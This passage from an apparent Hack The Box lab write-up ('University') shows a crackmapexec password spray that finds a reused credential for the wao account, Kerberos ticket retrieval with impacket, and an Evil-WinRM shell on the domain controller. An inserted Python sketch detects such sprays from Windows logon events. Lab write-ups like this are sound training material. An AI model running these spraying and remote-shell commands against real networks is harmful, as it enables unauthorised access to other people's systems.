wao


Checking whether the password WebAO1337 is reused by any account in users.txt:

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ crackmapexec smb $IP -u users.txt -p 'WebAO1337' --continue-on-success
SMB         10.129.252.94   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:university.htb) (signing:True) (SMBv1:False)
 
[...REDACTED...]
 
SMB         10.129.252.94   445    DC               [+] university.htb\WAO:WebAO1337 

The password WebAO1337 belongs to the wao user.
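From the defending side, one password tried against a whole user list typically appears in the Windows Security log as a burst of failed logons (event 4625) from one source against many accounts, followed by a success (event 4624). A detection sketch over constructed events, added here as an example and not part of the original notes; the sample IPs, the account names other than wao, the thresholds and the detect_spray function are assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (time, event_id, source_ip, account); not from the lab.
# 4625 = failed logon, 4624 = successful logon (Windows Security log).
EVENTS = [
    ("2025-01-01T10:00:01", 4625, "10.10.14.5", "alice"),
    ("2025-01-01T10:00:01", 4625, "10.10.14.5", "bob"),
    ("2025-01-01T10:00:02", 4625, "10.10.14.5", "carol"),
    ("2025-01-01T10:00:02", 4625, "10.10.14.5", "dave"),
    ("2025-01-01T10:00:03", 4624, "10.10.14.5", "wao"),
    ("2025-01-01T10:05:00", 4625, "10.10.20.7", "erin"),  # single typo, not a spray
    ("2025-01-01T10:05:20", 4624, "10.10.20.7", "erin"),
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return {source_ip: {"failed": [...], "compromised": [...]}} for sources
    that fail against >= min_accounts distinct accounts inside `window`.
    Accounts that log on successfully from the same source in that window
    are reported as likely compromised."""
    by_src = defaultdict(list)
    for ts, eid, src, acct in events:
        by_src[src].append((datetime.fromisoformat(ts), eid, acct.lower()))
    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        fails = [(t, a) for t, eid, a in rows if eid == 4625]
        # Slide a window over the failures and count distinct target accounts.
        for i, (start, _) in enumerate(fails):
            in_win = {a for t, a in fails[i:] if t - start <= window}
            if len(in_win) >= min_accounts:
                end = start + window
                hits = sorted({a for t, eid, a in rows
                               if eid == 4624 and start <= t <= end})
                findings[src] = {"failed": sorted(in_win), "compromised": hits}
                break
    return findings

if __name__ == "__main__":
    print(detect_spray(EVENTS))
```

Accounts listed under "compromised" are the ones to reset first, and the count of distinct failed accounts per source is the signal that per-account lockout thresholds do not catch.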

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ impacket-getTGT 'UNIVERSITY.HTB/wao@dc.university.htb' -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: WebAO1337
[*] Saving ticket in wao@dc.university.htb.ccache

Validated: a TGT was generated for the wao user.

WinRM


┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ echo -e '[realms]\n\n\tUNIVERSITY.HTB = {\n\t\tkdc = dc.university.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
 
	UNIVERSITY.HTB = {
		kdc = dc.university.htb
	}
 
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ evil-winrm -i dc.university.htb -u wao -p 'WebAO1337'              
 
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\WAO\Documents> whoami
university\wao
*Evil-WinRM* PS C:\Users\WAO\Documents> hostname
DC
*Evil-WinRM* PS C:\Users\WAO\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter vEthernet (Internal-VSwitch1):
 
   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::47c0:fbc9:2d7b:e4bb%6
   IPv4 Address. . . . . . . . . . . : 192.168.99.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::5c4a:da33:e1f2:e210
   Link-local IPv6 Address . . . . . : fe80::381c:7ab:c80:ef91%4
   IPv4 Address. . . . . . . . . . . : 10.129.252.94
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%4
                                       10.129.0.1

A WinRM session is established to the DC host as the wao user.